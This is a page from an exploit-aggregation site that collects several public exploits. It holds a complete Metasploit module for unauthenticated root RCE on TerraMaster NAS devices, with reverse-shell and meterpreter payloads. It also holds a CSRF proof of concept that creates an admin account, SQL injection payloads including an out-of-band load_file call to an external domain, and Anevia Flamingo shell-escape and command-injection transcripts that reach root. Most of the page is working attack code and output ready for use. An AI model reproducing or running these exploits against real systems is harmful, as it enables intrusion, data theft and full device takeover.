Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'digest/md5' require 'time' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989', 'Description' => %q{ This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29 and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information" and CVE-2022-24989, "Authenticated remote code execution". Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root on TerraMaster NAS devices. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor 'Octagon Networks', # Discovery '0xf4n9x' # POC ], 'References' => [ ['CVE', '2022-24990'], ['CVE', '2022-24989'], ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'], ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'], ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990'] ], 'DisclosureDate' => '2022-03-07', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => ['bourne', 'wget', 'curl'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8181, 'SSL' => false }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/']) ]) end def get_data # Initialise variable data to store the leaked data @data = {} # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS` # CVE-2022-24990 res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'), 'headers' => { 'User-Agent' => 'TNAS' } }) if res && res.code == 200 && res.body.include?('webNasIPS successful') # Parse the JSON response and get the data such as admin password hash and MAC address res_json = res.get_json_document unless res_json.blank? @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip @data['key'] = @data['mac'][6..11] # last three MAC address entries @data['timestamp'] = Time.new.to_i.to_s # derive signature @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp']) end end end def tos_encrypt_str(key, str_to_encrypt) id = key + str_to_encrypt return Digest::MD5.hexdigest(id.encode('utf-8')) end def execute_command(cmd, _opts = {}) # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid` # CVE-2022-24989 diskstring = Rex::Text.rand_text_alpha_upper(4..8) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'), 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'User-Agent' => 'TNAS', 'Authorization' => @data['password'], 'Signature' => @data['signature'], 'Timestamp' => @data['timestamp'] }, 'vars_post' => { 'raidtype' => ';' + cmd, 'diskstring' => diskstring.to_s } }) end def get_terramaster_info # get Terramaster CPU architecture (X64 or ARM64) and TOS version @terramaster = {} res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login') }) if res && res.body && res.code == 200 # get the version information from the request response like below: # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/> return if res.body.match(/ver=.+?"/).nil? version = res.body.match(/ver=.+?"/)[0] # check if architecture is ARM64 or X64 if version.match(/_A/) @terramaster['cpu_arch'] = 'ARM64' elsif version.match(/_S/) || version.match(/_Q/) @terramaster['cpu_arch'] = 'X64' else @terramaster['cpu_arch'] = 'UNKNOWN' end # strip TOS version number and remove trailing double quote. @terramaster['tos_version'] = version.split('.0_')[1].chop end end def check get_terramaster_info return CheckCode::Safe if @terramaster.empty? if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29') return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.") end CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.") end def exploit get_data fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty? print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper # Don't check the response here since the server won't respond # if the payload is successfully executed. execute_cmdstager(linemax: 65536) end end end </code></pre>

<pre><code>==================================================================================================================================== | # Title : EasyAnswer version 1.0.1 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit) | | # Vendor : https://www.codester.com/items/40311/ | | # Dork : "© 2022 Easy Answer All rights reserved." | ==================================================================================================================================== poc : [+] infected file: admins-create.php [+] Inside folder /admin/admins-create.php [+] Dorking İn Google Or Other Search Enggine. [+] Copy the code below and paste it into an HTML file. [+] Go to the line 17. [+] Set the target site link Save changes and apply . Create Administrator</h2> </div> </div> </div> </div> </div> <div class="row"> <div class="col-md-12 stretch-card"> <div class="card"> <div class="card-body"> <div id="messages"> </div> <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data"> <input type="hidden" id="submitform" name="submitform" value="1"> <div class="form-group row"> <label for="username" class="col-sm-2 col-form-label">Username:</label> <div class="col-sm-12"> <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME"> </div> </div> <div class="form-group row"> <label for="password" class="col-sm-2 col-form-label">Password:</label> <div class="col-sm-12"> <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD"> </div> </div> <div class="form-group row"> <label for="email" class="col-sm-2 col-form-label">E-Mail:</label> <div class="col-sm-12"> <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS"> </div> </div> <div class="row-spaces"></div> <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style="">Submit</button> </form> </div> </div> </div> </div> </div> Greetings to :=================================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| ================================================================================================== </code></pre>

<pre><code>## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 06.12.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can dump all information from the database of this system, and then he can use it for dangerous and malicious purposes! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: password (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html) ## Time spend: 01:15:00 </code></pre>

<pre><code> Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.2.9 Hardware revision 1.0 SoapLive 2.0.3 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device. Tested on: GNU/Linux 3.1.4 (x86_64) Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5780 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php 13.04.2023 -- $ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1 The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established. RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts. Anevia Flamingo XL root@192.168.1.1's password: Primary-XL> help available commands: bonding config date dns enable ethconfig exit exp firewall help hostname http igmpq imp ipconfig license log mail passwd persistent_logs ping reboot reset route serial settings sslconfig tcpdump timezone traceroute upgrade uptime version vlanconfig Primary-XL> tcpdump ;id tcpdump: illegal token: ; Primary-XL> id unknown command id Primary-XL> whoami unknown command whoami Primary-XL> ping ;id ping: ;id: Host name lookup failure Primary-XL> traceroute ;id BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries] [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface] [-z pausemsecs] host [data size] trace the route ip packets follow going to "host" Options: -F Set the don't fragment bit -I Use ICMP ECHO instead of UDP datagrams -l Display the ttl value of the returned packet -d Set SO_DEBUG options to socket -n Print hop addresses numerically rather than symbolically -r Bypass the normal routing tables and send directly to a host -v Verbose output -m max_ttl Set the max time-to-live (max number of hops) -p port# Set the base UDP port number used in probes (default is 33434) -q nqueries Set the number of probes per ``ttl'' to nqueries (default is 3) -s src_addr Use the following IP address as the source address -t tos Set the type-of-service in probe packets to the following value (default 0) -w wait Set the time (in seconds) to wait for a response to a probe (default 3 sec) -g Specify a loose source route gateway (8 maximum) uid=0(root) gid=0(root) groups=0(root) Primary-XL> version Software Revision: Anevia Flamingo XL v3.2.9 Hardware Revision: 1.0 (c) Anevia 2003-2012 Primary-XL> traceroute ;sh ... ... whoami root id uid=0(root) gid=0(root) groups=0(root) ls -al drwxr-xr-x 19 root root 1024 Oct 3 2022 . drwxr-xr-x 19 root root 1024 Oct 3 2022 .. drwxr-xr-x 2 root root 1024 Oct 21 2013 bin drwxrwxrwt 2 root root 40 Oct 3 2022 cores drwxr-xr-x 13 root root 27648 May 22 00:53 dev drwxr-xr-x 3 root root 1024 Oct 21 2013 emul drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc drwxr-xr-x 3 root root 1024 Oct 3 2022 home drwxr-xr-x 11 root root 3072 Oct 21 2013 lib lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib drwx------ 2 root root 12288 Oct 21 2013 lost+found drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions dr-xr-xr-x 177 root root 0 Oct 3 2022 proc drwxr-xr-x 4 root root 1024 Oct 21 2013 root drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin drwxr-xr-x 12 root root 0 Oct 3 2022 sys drwxrwxrwt 26 root root 1140 May 22 01:06 tmp drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr drwxr-xr-x 14 root root 1024 Oct 21 2013 var ls /var/www/admin _img configuration.php log_securemedia.php stream_dump.php _lang cores_and_logs_management.php login.php stream_services _lib dataminer_handshake.php logout.php streaming.php _style dvbt.php logs.php support.php about.php dvbt_scan.php main.php template ajax export.php manager.php time.php alarm.php fileprogress.php network.php toto.ts alarm_view.php firewall.php pear upload_helper.php authentication.php get_config power.php uptime.php bridges.php get_enquiry_pending.php read_settings.php usbloader.php cam.php get_upgrade_error.php receive_helper.php version.php channel.php heartbeat.php rescrambling webradio.php channel_xl_list.php include rescrambling.php webtv check_state input.php resilience webtv.php class js resilience.php xmltv.php common license.php restart_service.php config_snmp.php log.php set_oem.php python -c 'import pty; pty.spawn("/bin/bash")' root@Primary-XL:/# cd /usr/local/bin root@Primary-XL:/usr/local/bin# ls -al login -rwxr-xr-x 1 root root 35896 Feb 21 2012 login root@Primary-XL:/usr/local/bin# cd .. root@Primary-XL:/usr/local# ls commands/ bonding firewall mail timezone config help passwd traceroute date hostname persistent_logs upgrade dbg-serial http ping uptime dbg-set-oem igmpq route version dbg-updates-log imp serial vlanconfig dns ipconfig settings ethconfig license sslconfig exp log tcpdump root@Primary-XL:/usr/local# exit exit Primary-XL> enable password: Primary-XL# ;] </code></pre>

<pre><code> Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code Execution Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.6.20, 3.2.9 Hardware revision 1.1, 1.0 SoapLive 2.4.1, 2.0.3 SoapSystem 1.3.1 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Tested on: GNU/Linux 3.1.4 (x86_64) Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5779 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php 13.04.2023 -- > curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80... * Connected to 192.168.1.1 (192.168.1.1) port 80 (#0) > POST /admin/time.php HTTP/1.1 > Host: 192.168.1.1 > User-Agent: curl/8.0.1 > Accept: */* > Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 > Content-Length: 32 > Content-Type: application/x-www-form-urlencoded > } [32 bytes data] 100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found < Date: Thu, 13 Apr 2023 23:54:15 GMT < Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 < X-Powered-By: PHP/5.3.6 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache * Please rewind output before next send < Location: /admin/time.php < Transfer-Encoding: chunked < Content-Type: text/html < * Ignoring the response-body { [5 bytes data] 100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19 * Connection #0 to host 192.168.1.1 left intact * Issue another request to this URL: 'http://192.168.1.1/admin/time.php' * Switch from POST to GET * Found bundle for host: 0x1de6c6321b0 [serially] * Re-using existing connection #0 with host 192.168.1.1 > POST /admin/time.php HTTP/1.1 > Host: 192.168.1.1 > User-Agent: curl/8.0.1 > Accept: */* > Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 > < HTTP/1.1 200 OK < Date: Thu, 13 Apr 2023 23:54:17 GMT < Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 < X-Powered-By: PHP/5.3.6 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < Transfer-Encoding: chunked < Content-Type: text/html < { [13853 bytes data] 14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root) <----------------------<< 14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root) <----------------------<< 100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k * Connection #0 to host 192.168.1.1 left intact </code></pre>

<pre><code> Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.6.5 Hardware revision: 1.1 SoapLive 2.4.0 SoapSystem 1.3.1 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Tested on: GNU/Linux 3.14.29 (x86_64) Apache/2.2.22 (Debian) PHP/5.6.0-0anevia2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5778 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php 13.04.2023 -- $ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data <td>uid=33(www-data)</td> <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/> <td>gid=33(www-data)</td> <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/> <td>groups=33(www-data),6(disk),25(floppy)</td> <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/> --- $ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root <td>uid=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/> <td>gid=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/> <td>groups=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/> </code></pre>